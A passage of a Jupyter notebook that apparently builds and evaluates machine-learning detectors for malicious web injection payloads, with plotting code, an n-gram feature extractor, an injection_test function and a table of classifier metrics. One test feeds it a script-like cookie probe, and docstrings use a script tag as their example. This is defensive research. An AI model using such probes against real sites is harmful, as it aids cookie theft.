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\nli3T3//+dy3235Thtttu05tvvqnMzEx16dJFAwcO1N/+9jfNmjVLxx9/vLp27SpJeuutt9SoUSN9\n8MEHWrRoke655x7NmDEjyp9o+ThDDQAAUE22bNmi9u3byxij008/XevWrdPatWvVsWNHSSp5DkhP\nT9fIkSM1bNgw5eXlad++fRXGPnjwoFq2dCZLK29IRl5enpYsWaI+ffpo5cqVkqSvv/5aV111lXJy\ncrR48WJt3LixwnzatGmjRo0aSZJWrVqliRMnKicnR6+++qq2bNmikSNH6u2339aQIUP0zjvv6Ljj\njtPZZ5+toUOH6m9/+5uKi4M3k1u7dq3OOOMMSdIZZ5yhb7/9VpJ07LHH6ogjjtARRxxRavtQnTt3\n1ocffihjjA477LCS9cXFxcrKylJ6erratGmjzZs3a8uWLWrbtq1SUlJKPsuqVav02muvKScnR7fe\neqt27dpV4TGNFmeoAQBA7efRNWNNmzbV6tWr1a5dO33xxRe67rrr1KZNG3355Zfq2bNnyXNAcXGx\nBg0apCFDhujuu+/Wq6++qvT09HKLzbp162rTpk1q3rx5peOcJ06cqAEDBqh3795q27at7r//frVu\n3VrWWhUXF2vt2rX68ssv1bFjR3355ZdKS3PKw9B47dq100UXXaRu3bpJcs6kFxUVacaMGTp48KA6\nduyoHj16aPTo0UpJSdGIESO0cOHCkv3btGmj119/XZL0+eef6/jjj5ckhTM3uDFGf/rTn3TssceW\nWp+SkqLt27crMzNT3377rY4++mg1bdpU3377rdq0aaMvvvhCF198sdq1a6dBgwbp73//e0nusUZB\nDQAAECMLFiwoKZB79uypyZMn6+qrr5a1Vn369FF2drZuvfVWXXbZZXrggQeUkZGh9PT0kv337Nmj\n/v37yxgjY4xmz56tAwcO6PLLL9eiRYt09913l2z74IMPatCgQUpPT1efPn10yy23lJtTs2bN1Lx5\nc3322WeaMmWKrrvuOh04cECpqal6+umndfXVV2vgwIH697//raysLJ144omHxJgwYYKuueYaTZw4\nUZJ077336pNPPtGrr76qoqIiDR8+XOvXr9dVV12l1NRUNWjQQKeffrrmz58vKXhxYdeuXZWWlqZ/\n/etfER3X6667TpJKDXm5++671adPHxljNGrUKGVkZOiuu+7S4MGD1aRJk5Kz6/369dP8+fOVm5sr\n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\n",
 39 |       "text/plain": [
 40 |        "<matplotlib.figure.Figure at 0x1c8eb2a79e8>"
 41 |       ]
 42 |      },
 43 |      "metadata": {},
 44 |      "output_type": "display_data"
 45 |     }
 46 |    ],
 47 |    "source": [
 48 |     "xmin, xmax = -7, 5\n",
 49 |     "n = 50\n",
 50 |     "np.random.seed(0)\n",
 51 |     "X = np.random.normal(size=n)\n",
 52 |     "y = (X > 0).astype(np.float)\n",
 53 |     "X[X >= 0] *= 4\n",
 54 |     "X[X >= 0] += 2\n",
 55 |     "X[X < 0] -= 2\n",
 56 |     "\n",
 57 |     "# plot separated\n",
 58 |     "f, axarr = plt.subplots(1,2, sharey=True)\n",
 59 |     "f.set_figheight(5)\n",
 60 |     "f.set_figwidth(12)\n",
 61 |     "\n",
 62 |     "'''\n",
 63 |     "Figure 0\n",
 64 |     "'''\n",
 65 |     "for t,marker,c in zip([0.0,1.0],\"ox\",\"gb\"):\n",
 66 |     "    # plot each class on its own to get different colored markers\n",
 67 |     "    axarr[0].scatter(X[y == t],\n",
 68 |     "                np.zeros(len(X[y==t])),\n",
 69 |     "                marker=marker,\n",
 70 |     "                c=c)\n",
 71 |     "    \n",
 72 |     "X_test = np.linspace(-7, 10, 300)\n",
 73 |     "\n",
 74 |     "axarr[0].set_ylabel('y')\n",
 75 |     "axarr[0].set_xlabel('X')\n",
 76 |     "axarr[0].set_xticks(range(-7, 10))\n",
 77 |     "axarr[0].set_yticks([0, 0.5, 1])\n",
 78 |     "axarr[0].set_ylim(-.25, 1.25)\n",
 79 |     "axarr[0].set_xlim(-7, 10)\n",
 80 |     "axarr[0].legend(('class 0', 'class 1'),\n",
 81 |     "           loc=\"lower right\", fontsize='small')\n",
 82 |     "\n",
 83 |     "\n",
 84 |     "'''\n",
 85 |     "Figure 1\n",
 86 |     "'''\n",
 87 |     "for t,marker,c in zip([0.0,1.0],\"ox\",\"gb\"):\n",
 88 |     "    # plot each class on its own to get different colored markers\n",
 89 |     "    axarr[1].scatter(X[y == t],\n",
 90 |     "                y[y==t],\n",
 91 |     "                marker=marker,\n",
 92 |     "                c=c)\n",
 93 |     "    \n",
 94 |     "#plt.scatter(X, y, c=y,color='black', zorder=20)\n",
 95 |     "X_test = np.linspace(-7, 10, 300)\n",
 96 |     "\n",
 97 |     "\n",
 98 |     "def model(x):\n",
 99 |     "    return 1 / (1 + np.exp(-x))\n",
100 |     "\n",
101 |     "loss = model(X_test)\n",
102 |     "axarr[1].plot(X_test, loss, color='red', linewidth=3)\n",
103 |     "\n",
104 |     "\n",
105 |     "axarr[1].set_ylabel('y')\n",
106 |     "axarr[1].set_xlabel('X')\n",
107 |     "axarr[1].set_xticks(range(-7, 10))\n",
108 |     "axarr[1].set_yticks([0, 0.5, 1])\n",
109 |     "axarr[1].set_ylim(-.25, 1.25)\n",
110 |     "axarr[1].set_xlim(-7, 10)\n",
111 |     "axarr[1].legend(('Logistic Regression Model', 'class 0', 'class 1'),\n",
112 |     "           loc=\"lower right\", fontsize='small')\n",
113 |     "plt.show()\n",
114 |     "\n",
115 |     "f.savefig('images/report_images/logistic.png', bbox_inches='tight')"
116 |    ]
117 |   },
118 |   {
119 |    "cell_type": "markdown",
120 |    "metadata": {},
121 |    "source": [
122 |     "### Support vector machine\n",
123 |     "This is matlab code on how the image demonstrating linear vs RBF kernel was made (svm_kernel.png)"
124 |    ]
125 |   },
126 |   {
127 |    "cell_type": "code",
128 |    "execution_count": null,
129 |    "metadata": {
130 |     "collapsed": true
131 |    },
132 |    "outputs": [],
133 |    "source": [
134 |     "'''\n",
135 |     "clear\n",
136 |     "clc\n",
137 |     "load('d2.mat');\n",
138 |     "\n",
139 |     "hold on\n",
140 |     "gscatter(X(:,1),X(:,2),Y,'rb','x+',6);\n",
141 |     "\n",
142 |     "SVMstruct = svmtrain(X,Y,'boxconstraint',1,'autoscale',false,'kernel_function','RBF');\n",
143 |     "        \n",
144 |     "% Make a grid of values to classify the entire space\n",
145 |     "x1_axis = linspace(min(X(:,1)), max(X(:,1)), 1000)';\n",
146 |     "x2_axis = linspace(min(X(:,2)), max(X(:,2)), 1000)';\n",
147 |     "\n",
148 |     "[x1_space, x2_space] = meshgrid(x1_axis, x2_axis);\n",
149 |     "\n",
150 |     "for i = 1:size(x1_space, 2)\n",
151 |     "   point_in_space = [x1_space(:, i), x2_space(:, i)];\n",
152 |     "   class(:, i) = svmclassify(SVMstruct, point_in_space);\n",
153 |     "end\n",
154 |     "\n",
155 |     "% Plot the SVM boundary\n",
156 |     "hold on\n",
157 |     "contour(x1_space, x2_space, class, [0 0], 'k');\n",
158 |     "legend('-1','1','RBF boundary');\n",
159 |     "xlabel('x1');\n",
160 |     "ylabel('x2');\n",
161 |     "title('Data points and decision boundary');\n",
162 |     "hold off;\n",
163 |     "'''"
164 |    ]
165 |   },
166 |   {
167 |    "cell_type": "code",
168 |    "execution_count": 28,
169 |    "metadata": {
170 |     "collapsed": true
171 |    },
172 |    "outputs": [],
173 |    "source": [
174 |     "import pickle\n",
175 |     "from sklearn.feature_extraction.text import TfidfVectorizer\n",
176 |     "from sklearn.ensemble import RandomForestClassifier\n",
177 |     "\n",
178 |     "def get2Grams(payload_obj):\n",
179 |     "    '''Divides a string into 2-grams\n",
180 |     "    \n",
181 |     "    Example: input - payload: \"<script>\"\n",
182 |     "             output- [\"<s\",\"sc\",\"cr\",\"ri\",\"ip\",\"pt\",\"t>\"]\n",
183 |     "    '''\n",
184 |     "    payload = str(payload_obj)\n",
185 |     "    ngrams = []\n",
186 |     "    for i in range(0,len(payload)-2):\n",
187 |     "        ngrams.append(payload[i:i+2])\n",
188 |     "    return ngrams\n",
189 |     "\n",
190 |     "classifier = pickle.load( open(\"data/tfidf_2grams_randomforest.p\", \"rb\"))\n",
191 |     "\n",
192 |     "def injection_test(inputs):\n",
193 |     "    variables = inputs.split('&')\n",
194 |     "    values = [ variable.split('=')[1] for variable in variables]\n",
195 |     "    print(values)\n",
196 |     "    return 'MALICIOUS' if classifier.predict(values).sum() > 0 else 'NOT_MALICIOUS'\n"
197 |    ]
198 |   },
199 |   {
200 |    "cell_type": "code",
201 |    "execution_count": 43,
202 |    "metadata": {},
203 |    "outputs": [
204 |     {
205 |      "name": "stdout",
206 |      "output_type": "stream",
207 |      "text": [
208 |       "['<rip cookie']\n"
209 |      ]
210 |     },
211 |     {
212 |      "data": {
213 |       "text/plain": [
214 |        "'NOT_MALICIOUS'"
215 |       ]
216 |      },
217 |      "execution_count": 43,
218 |      "metadata": {},
219 |      "output_type": "execute_result"
220 |     }
221 |    ],
222 |    "source": [
223 |     "injection_test('var1=<rip cookie')"
224 |    ]
225 |   },
226 |   {
227 |    "cell_type": "code",
228 |    "execution_count": 48,
229 |    "metadata": {
230 |     "collapsed": true
231 |    },
232 |    "outputs": [],
233 |    "source": [
234 |     "def get1Grams(payload_obj):\n",
235 |     "    '''Divides a string into 1-grams\n",
236 |     "    \n",
237 |     "    Example: input - payload: \"<script>\"\n",
238 |     "             output- [\"<\",\"s\",\"c\",\"r\",\"i\",\"p\",\"t\",\">\"]\n",
239 |     "    '''\n",
240 |     "    payload = str(payload_obj)\n",
241 |     "    ngrams = []\n",
242 |     "    for i in range(0,len(payload)-1):\n",
243 |     "        ngrams.append(payload[i:i+1])\n",
244 |     "    return ngrams\n",
245 |     "\n",
246 |     "def get2Grams(payload_obj):\n",
247 |     "    '''Divides a string into 2-grams\n",
248 |     "    \n",
249 |     "    Example: input - payload: \"<script>\"\n",
250 |     "             output- [\"<s\",\"sc\",\"cr\",\"ri\",\"ip\",\"pt\",\"t>\"]\n",
251 |     "    '''\n",
252 |     "    payload = str(payload_obj)\n",
253 |     "    ngrams = []\n",
254 |     "    for i in range(0,len(payload)-2):\n",
255 |     "        ngrams.append(payload[i:i+2])\n",
256 |     "    return ngrams\n",
257 |     "\n",
258 |     "def get3Grams(payload_obj):\n",
259 |     "    '''Divides a string into 3-grams\n",
260 |     "    \n",
261 |     "    Example: input - payload: \"<script>\"\n",
262 |     "             output- [\"<sc\",\"scr\",\"cri\",\"rip\",\"ipt\",\"pt>\"]\n",
263 |     "    '''\n",
264 |     "    payload = str(payload_obj)\n",
265 |     "    ngrams = []\n",
266 |     "    for i in range(0,len(payload)-3):\n",
267 |     "        ngrams.append(payload[i:i+3])\n",
268 |     "    return ngrams\n",
269 |     "\n",
270 |     "classifierz = pickle.load( open(\"data/trained_classifiers.p\", \"rb\"))[['accuracy','sensitivity','specificity','auc','conf_matrix','params']]\n"
271 |    ]
272 |   },
273 |   {
274 |    "cell_type": "code",
275 |    "execution_count": 50,
276 |    "metadata": {},
277 |    "outputs": [
278 |     {
279 |      "data": {
280 |       "text/html": [
281 |        "<div>\n",
282 |        "<table border=\"1\" class=\"dataframe\">\n",
283 |        "  <thead>\n",
284 |        "    <tr style=\"text-align: right;\">\n",
285 |        "      <th></th>\n",
286 |        "      <th>accuracy</th>\n",
287 |        "      <th>sensitivity</th>\n",
288 |        "      <th>specificity</th>\n",
289 |        "      <th>auc</th>\n",
290 |        "      <th>conf_matrix</th>\n",
291 |        "      <th>params</th>\n",
292 |        "    </tr>\n",
293 |        "  </thead>\n",
294 |        "  <tbody>\n",
295 |        "    <tr>\n",
296 |        "      <th>tfidf 1grams RandomForest</th>\n",
297 |        "      <td>0.998324</td>\n",
298 |        "      <td>0.992883</td>\n",
299 |        "      <td>0.998856</td>\n",
300 |        "      <td>0.999167</td>\n",
301 |        "      <td>[[20082, 23], [14, 1953]]</td>\n",
302 |        "      <td>{'vect__min_df': 40, 'clf__n_estimators': 60}</td>\n",
303 |        "    </tr>\n",
304 |        "    <tr>\n",
305 |        "      <th>count 1grams RandomForest</th>\n",
306 |        "      <td>0.998414</td>\n",
307 |        "      <td>0.989832</td>\n",
308 |        "      <td>0.999254</td>\n",
309 |        "      <td>0.999426</td>\n",
310 |        "      <td>[[20090, 15], [20, 1947]]</td>\n",
311 |        "      <td>{'vect__min_df': 1, 'clf__n_estimators': 60}</td>\n",
312 |        "    </tr>\n",
313 |        "    <tr>\n",
314 |        "      <th>tfidf 2grams RandomForest</th>\n",
315 |        "      <td>0.998596</td>\n",
316 |        "      <td>0.988307</td>\n",
317 |        "      <td>0.999602</td>\n",
318 |        "      <td>0.999375</td>\n",
319 |        "      <td>[[20097, 8], [23, 1944]]</td>\n",
320 |        "      <td>{'vect__min_df': 5, 'clf__n_estimators': 60}</td>\n",
321 |        "    </tr>\n",
322 |        "    <tr>\n",
323 |        "      <th>count 2grams RandomForest</th>\n",
324 |        "      <td>0.998414</td>\n",
325 |        "      <td>0.988307</td>\n",
326 |        "      <td>0.999403</td>\n",
327 |        "      <td>0.99912</td>\n",
328 |        "      <td>[[20093, 12], [23, 1944]]</td>\n",
329 |        "      <td>{'vect__min_df': 1, 'clf__n_estimators': 60}</td>\n",
330 |        "    </tr>\n",
331 |        "    <tr>\n",
332 |        "      <th>tfidf 2grams Logistic</th>\n",
333 |        "      <td>0.998142</td>\n",
334 |        "      <td>0.985257</td>\n",
335 |        "      <td>0.999403</td>\n",
336 |        "      <td>0.999489</td>\n",
337 |        "      <td>[[20093, 12], [29, 1938]]</td>\n",
338 |        "      <td>{'clf__C': 1000, 'vect__min_df': 1}</td>\n",
339 |        "    </tr>\n",
340 |        "    <tr>\n",
341 |        "      <th>custom SVM</th>\n",
342 |        "      <td>0.99411</td>\n",
343 |        "      <td>0.985257</td>\n",
344 |        "      <td>0.994976</td>\n",
345 |        "      <td>0.997742</td>\n",
346 |        "      <td>[[20004, 101], [29, 1938]]</td>\n",
347 |        "      <td>{'C': 100, 'gamma': 'auto', 'kernel': 'rbf'}</td>\n",
348 |        "    </tr>\n",
349 |        "    <tr>\n",
350 |        "      <th>count 3grams MultinomialNB</th>\n",
351 |        "      <td>0.993567</td>\n",
352 |        "      <td>0.981698</td>\n",
353 |        "      <td>0.994728</td>\n",
354 |        "      <td>0.997707</td>\n",
355 |        "      <td>[[19999, 106], [36, 1931]]</td>\n",
356 |        "      <td>{'vect__min_df': 1}</td>\n",
357 |        "    </tr>\n",
358 |        "    <tr>\n",
359 |        "      <th>count 1grams SVM</th>\n",
360 |        "      <td>0.997327</td>\n",
361 |        "      <td>0.980173</td>\n",
362 |        "      <td>0.999005</td>\n",
